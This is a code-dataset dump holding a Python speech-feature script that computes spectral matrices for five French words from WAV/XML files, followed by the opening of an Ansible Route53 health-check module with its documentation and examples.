repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
daniel20162016/my-first | read_xml_all/calcul_matrix_je_le_qui_dans_de_192_matrix_compare_df_good.py | 2 | 34715 | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 31 15:45:22 2016
@author: wang
"""
#from matplotlib import pylab as plt
#from numpy import fft, fromstring, int16, linspace
#import wave
from read_wav_xml_good_1 import*
from matrix_24_2 import*
from max_matrix_norm import*
import numpy as np
# open a wave file
#filename = 'francois_filon_pure_3.wav'
#filename_1 ='francois_filon_pure_3.xml'
#word ='je'
#word_2='le'
#word_3='qui'
#word_4='dans'
#word_5='de'
def calcul_matrix_je_le_qui_dans_de_192_matrix_compare_df_good(filename, filename_1,word,word_2,word_3,word_4,word_5):
#==============================================================================
# this is the parti for the 'je' start
#==============================================================================
wave_signal_float,framerate, word_start_point, word_length_point, word_end_point= read_wav_xml_good_1(filename,filename_1,word)
XJ_1 =wave_signal_float
t_step=1920;
t_entre_step=1440;
t_du_1_1 = int(word_start_point[0]);
t_du_1_2 = int(word_end_point[0]);
t_du_2_1 = int(word_start_point[1]);
t_du_2_2 = int(word_end_point[1]);
t_du_3_1 = int(word_start_point[2]);
t_du_3_2 = int(word_end_point[2]);
t_du_4_1 = int(word_start_point[3]);
t_du_4_2 = int(word_end_point[3]);
t_du_5_1 = int(word_start_point[4]);
t_du_5_2 = int(word_end_point[4]);
fs=framerate
#XJ_du_1 = wave_signal_float[(t_du_1_1-1):t_du_1_2];
#length_XJ_du_1 = int(word_length_point[0]+1);
#x1,y1,z1=matrix_24_2(XJ_du_1,fs)
#x1=max_matrix_norm(x1)
#==============================================================================
# this part is to calcul the first matrix
#==============================================================================
XJ_du_1_2 = XJ_1[(t_du_1_1-1):(t_du_1_1+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_1 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_1[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_du_1_1+t_entre_step*(i)-1):(t_du_1_1+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_1[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the second matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_2_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_2 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_2[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_2[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 3 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_3_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_3 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_3[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_3[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 4 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_4_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_4 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_4[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_4[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 5 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_5_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_5 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_5[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_5[24*i+j]=x1_all[j]
je_compare_1 = matrix_all_step_new_1
je_compare_2 = matrix_all_step_new_2
je_compare_3 = matrix_all_step_new_3
je_compare_4 = matrix_all_step_new_4
je_compare_5 = matrix_all_step_new_5
#==============================================================================
# # this is the parti for the 'je' end
#==============================================================================
#np.savez('je_le_qui_dans_de_192_matrix.npz',matrix_all_step_new_1,matrix_all_step_new_2,matrix_all_step_new_3,matrix_all_step_new_4,matrix_all_step_new_5)
#==============================================================================
#==============================================================================
#==============================================================================
#==============================================================================
#==============================================================================
#==============================================================================
#==============================================================================
#==============================================================================
# # # # # # # # demain, je continue ici
#==============================================================================
#==============================================================================
#==============================================================================
#==============================================================================
#==============================================================================
#==============================================================================
#==============================================================================
#==============================================================================
#==============================================================================
# this is the parti for the 'le' start
#==============================================================================
wave_signal_float,framerate, word_start_point, word_length_point, word_end_point= read_wav_xml_good_1(filename,filename_1,word_2)
XJ_1 =wave_signal_float
t_step=1920;
t_entre_step=1440;
t_du_1_1 = int(word_start_point[0]);
t_du_1_2 = int(word_end_point[0]);
t_du_2_1 = int(word_start_point[1]);
t_du_2_2 = int(word_end_point[1]);
t_du_3_1 = int(word_start_point[2]);
t_du_3_2 = int(word_end_point[2]);
t_du_4_1 = int(word_start_point[3]);
t_du_4_2 = int(word_end_point[3]);
t_du_5_1 = int(word_start_point[4]);
t_du_5_2 = int(word_end_point[4]);
fs=framerate
#XJ_du_1 = wave_signal_float[(t_du_1_1-1):t_du_1_2];
#length_XJ_du_1 = int(word_length_point[0]+1);
#x1,y1,z1=matrix_24_2(XJ_du_1,fs)
#x1=max_matrix_norm(x1)
#==============================================================================
# this part is to calcul the first matrix
#==============================================================================
XJ_du_1_2 = XJ_1[(t_du_1_1-1):(t_du_1_1+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_1 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_1[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_du_1_1+t_entre_step*(i)-1):(t_du_1_1+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_1[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the second matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_2_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_2 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_2[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_2[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 3 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_3_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_3 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_3[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_3[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 4 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_4_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_4 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_4[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_4[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 5 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_5_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_5 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_5[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_5[24*i+j]=x1_all[j]
le_compare_1 = matrix_all_step_new_1
le_compare_2 = matrix_all_step_new_2
le_compare_3 = matrix_all_step_new_3
le_compare_4 = matrix_all_step_new_4
le_compare_5 = matrix_all_step_new_5
#==============================================================================
# # this is the parti for the 'le' end
#==============================================================================
#==============================================================================
# this is the parti for the 'qui' start
#==============================================================================
wave_signal_float,framerate, word_start_point, word_length_point, word_end_point= read_wav_xml_good_1(filename,filename_1,word_3)
XJ_1 =wave_signal_float
t_step=1920;
t_entre_step=1440;
t_du_1_1 = int(word_start_point[0]);
t_du_1_2 = int(word_end_point[0]);
t_du_2_1 = int(word_start_point[1]);
t_du_2_2 = int(word_end_point[1]);
t_du_3_1 = int(word_start_point[2]);
t_du_3_2 = int(word_end_point[2]);
t_du_4_1 = int(word_start_point[3]);
t_du_4_2 = int(word_end_point[3]);
t_du_5_1 = int(word_start_point[4]);
t_du_5_2 = int(word_end_point[4]);
fs=framerate
#XJ_du_1 = wave_signal_float[(t_du_1_1-1):t_du_1_2];
#length_XJ_du_1 = int(word_length_point[0]+1);
#x1,y1,z1=matrix_24_2(XJ_du_1,fs)
#x1=max_matrix_norm(x1)
#==============================================================================
# this part is to calcul the first matrix
#==============================================================================
XJ_du_1_2 = XJ_1[(t_du_1_1-1):(t_du_1_1+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_1 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_1[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_du_1_1+t_entre_step*(i)-1):(t_du_1_1+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_1[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the second matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_2_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_2 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_2[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_2[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 3 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_3_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_3 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_3[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_3[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 4 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_4_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_4 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_4[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_4[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 5 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_5_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_5 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_5[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_5[24*i+j]=x1_all[j]
qui_compare_1 = matrix_all_step_new_1
qui_compare_2 = matrix_all_step_new_2
qui_compare_3 = matrix_all_step_new_3
qui_compare_4 = matrix_all_step_new_4
qui_compare_5 = matrix_all_step_new_5
#==============================================================================
# this is the parti for the 'dans' start
#==============================================================================
wave_signal_float,framerate, word_start_point, word_length_point, word_end_point= read_wav_xml_good_1(filename,filename_1,word_4)
XJ_1 =wave_signal_float
t_step=1920;
t_entre_step=1440;
t_du_1_1 = int(word_start_point[0]);
t_du_1_2 = int(word_end_point[0]);
t_du_2_1 = int(word_start_point[1]);
t_du_2_2 = int(word_end_point[1]);
t_du_3_1 = int(word_start_point[2]);
t_du_3_2 = int(word_end_point[2]);
t_du_4_1 = int(word_start_point[3]);
t_du_4_2 = int(word_end_point[3]);
t_du_5_1 = int(word_start_point[4]);
t_du_5_2 = int(word_end_point[4]);
fs=framerate
#XJ_du_1 = wave_signal_float[(t_du_1_1-1):t_du_1_2];
#length_XJ_du_1 = int(word_length_point[0]+1);
#x1,y1,z1=matrix_24_2(XJ_du_1,fs)
#x1=max_matrix_norm(x1)
#==============================================================================
# this part is to calcul the first matrix
#==============================================================================
XJ_du_1_2 = XJ_1[(t_du_1_1-1):(t_du_1_1+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_1 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_1[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_du_1_1+t_entre_step*(i)-1):(t_du_1_1+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_1[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the second matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_2_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_2 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_2[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_2[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 3 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_3_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_3 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_3[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_3[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 4 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_4_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_4 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_4[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_4[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 5 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_5_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_5 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_5[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_5[24*i+j]=x1_all[j]
dans_compare_1 = matrix_all_step_new_1
dans_compare_2 = matrix_all_step_new_2
dans_compare_3 = matrix_all_step_new_3
dans_compare_4 = matrix_all_step_new_4
dans_compare_5 = matrix_all_step_new_5
#==============================================================================
# this is the parti for the 'de' start
#==============================================================================
wave_signal_float,framerate, word_start_point, word_length_point, word_end_point= read_wav_xml_good_1(filename,filename_1,word_5)
XJ_1 =wave_signal_float
t_step=1920;
t_entre_step=1440;
t_du_1_1 = int(word_start_point[0]);
t_du_1_2 = int(word_end_point[0]);
t_du_2_1 = int(word_start_point[1]);
t_du_2_2 = int(word_end_point[1]);
t_du_3_1 = int(word_start_point[2]);
t_du_3_2 = int(word_end_point[2]);
t_du_4_1 = int(word_start_point[3]);
t_du_4_2 = int(word_end_point[3]);
t_du_5_1 = int(word_start_point[4]);
t_du_5_2 = int(word_end_point[4]);
fs=framerate
#XJ_du_1 = wave_signal_float[(t_du_1_1-1):t_du_1_2];
#length_XJ_du_1 = int(word_length_point[0]+1);
#x1,y1,z1=matrix_24_2(XJ_du_1,fs)
#x1=max_matrix_norm(x1)
#==============================================================================
# this part is to calcul the first matrix
#==============================================================================
XJ_du_1_2 = XJ_1[(t_du_1_1-1):(t_du_1_1+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_1 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_1[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_du_1_1+t_entre_step*(i)-1):(t_du_1_1+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_1[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the second matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_2_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_2 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_2[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_2[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 3 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_3_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_3 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_3[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_3[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 4 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_4_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_4 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_4[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_4[24*i+j]=x1_all[j]
#==============================================================================
# this part is to calcul the 5 matrix
#==============================================================================
for k in range (1,2):
t_start=t_du_5_1
XJ_du_1_2 = XJ_1[(t_start-1):(t_start+t_step)];
x1_1,y1_1,z1_1=matrix_24_2(XJ_du_1_2 ,fs)
x1_1=max_matrix_norm(x1_1)
matrix_all_step_new_5 = np.zeros([192])
for i in range(0,24):
matrix_all_step_new_5[i]=x1_1[i]
#==============================================================================
# the other colonne is the all fft
#==============================================================================
for i in range(1,8):
# print i
XJ_du_1_total = XJ_1[(t_start+t_entre_step*(i)-1):(t_start+t_step+t_entre_step*(i) )];
x1_all,y1_all,z1_all=matrix_24_2(XJ_du_1_total,fs)
x1_all=max_matrix_norm(x1_all)
for j in range(0,24):
matrix_all_step_new_5[24*i+j]=x1_all[j]
de_compare_1 = matrix_all_step_new_1
de_compare_2 = matrix_all_step_new_2
de_compare_3 = matrix_all_step_new_3
de_compare_4 = matrix_all_step_new_4
de_compare_5 = matrix_all_step_new_5
#==============================================================================
# # this is the parti for the 'le' end
#==============================================================================
np.savez('je_le_qui_dans_de_192_matrix_compare.npz',je_compare_1,je_compare_2,je_compare_3,je_compare_4,je_compare_5,le_compare_1,le_compare_2,le_compare_3,le_compare_4,le_compare_5,qui_compare_1,qui_compare_2,qui_compare_3,qui_compare_4,qui_compare_5,dans_compare_1,dans_compare_2,dans_compare_3,dans_compare_4,dans_compare_5,de_compare_1,de_compare_2,de_compare_3,de_compare_4,de_compare_5)
finish_2=1
return finish_2 | mit |
UnderGreen/ansible-modules-extras | cloud/amazon/route53_health_check.py | 62 | 13115 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: route53_health_check
short_description: add or delete health-checks in Amazons Route53 DNS service
description:
- Creates and deletes DNS Health checks in Amazons Route53 service
- Only the port, resource_path, string_match and request_interval are
considered when updating existing health-checks.
version_added: "2.0"
options:
state:
description:
- Specifies the action to take.
required: true
choices: [ 'present', 'absent' ]
ip_address:
description:
- IP address of the end-point to check. Either this or `fqdn` has to be
provided.
required: false
default: null
port:
description:
- The port on the endpoint on which you want Amazon Route 53 to perform
health checks. Required for TCP checks.
required: false
default: null
type:
description:
- The type of health check that you want to create, which indicates how
Amazon Route 53 determines whether an endpoint is healthy.
required: true
choices: [ 'HTTP', 'HTTPS', 'HTTP_STR_MATCH', 'HTTPS_STR_MATCH', 'TCP' ]
resource_path:
description:
- The path that you want Amazon Route 53 to request when performing
health checks. The path can be any value for which your endpoint will
return an HTTP status code of 2xx or 3xx when the endpoint is healthy,
for example the file /docs/route53-health-check.html.
- Required for all checks except TCP.
- The path must begin with a /
- Maximum 255 characters.
required: false
default: null
fqdn:
description:
- Domain name of the endpoint to check. Either this or `ip_address` has
to be provided. When both are given the `fqdn` is used in the `Host:`
header of the HTTP request.
required: false
string_match:
description:
- If the check type is HTTP_STR_MATCH or HTTP_STR_MATCH, the string
that you want Amazon Route 53 to search for in the response body from
the specified resource. If the string appears in the first 5120 bytes
of the response body, Amazon Route 53 considers the resource healthy.
required: false
default: null
request_interval:
description:
- The number of seconds between the time that Amazon Route 53 gets a
response from your endpoint and the time that it sends the next
health-check request.
required: true
default: 30
choices: [ 10, 30 ]
failure_threshold:
description:
- The number of consecutive health checks that an endpoint must pass or
fail for Amazon Route 53 to change the current status of the endpoint
from unhealthy to healthy or vice versa.
required: true
default: 3
choices: [ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 ]
author: "zimbatm (@zimbatm)"
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Create a health-check for host1.example.com and use it in record
- route53_health_check:
state: present
fqdn: host1.example.com
type: HTTP_STR_MATCH
resource_path: /
string_match: "Hello"
request_interval: 10
failure_threshold: 2
register: my_health_check
- route53:
action: create
zone: "example.com"
type: CNAME
record: "www.example.com"
value: host1.example.com
ttl: 30
# Routing policy
identifier: "host1@www"
weight: 100
health_check: "{{ my_health_check.health_check.id }}"
# Delete health-check
- route53_health_check:
state: absent
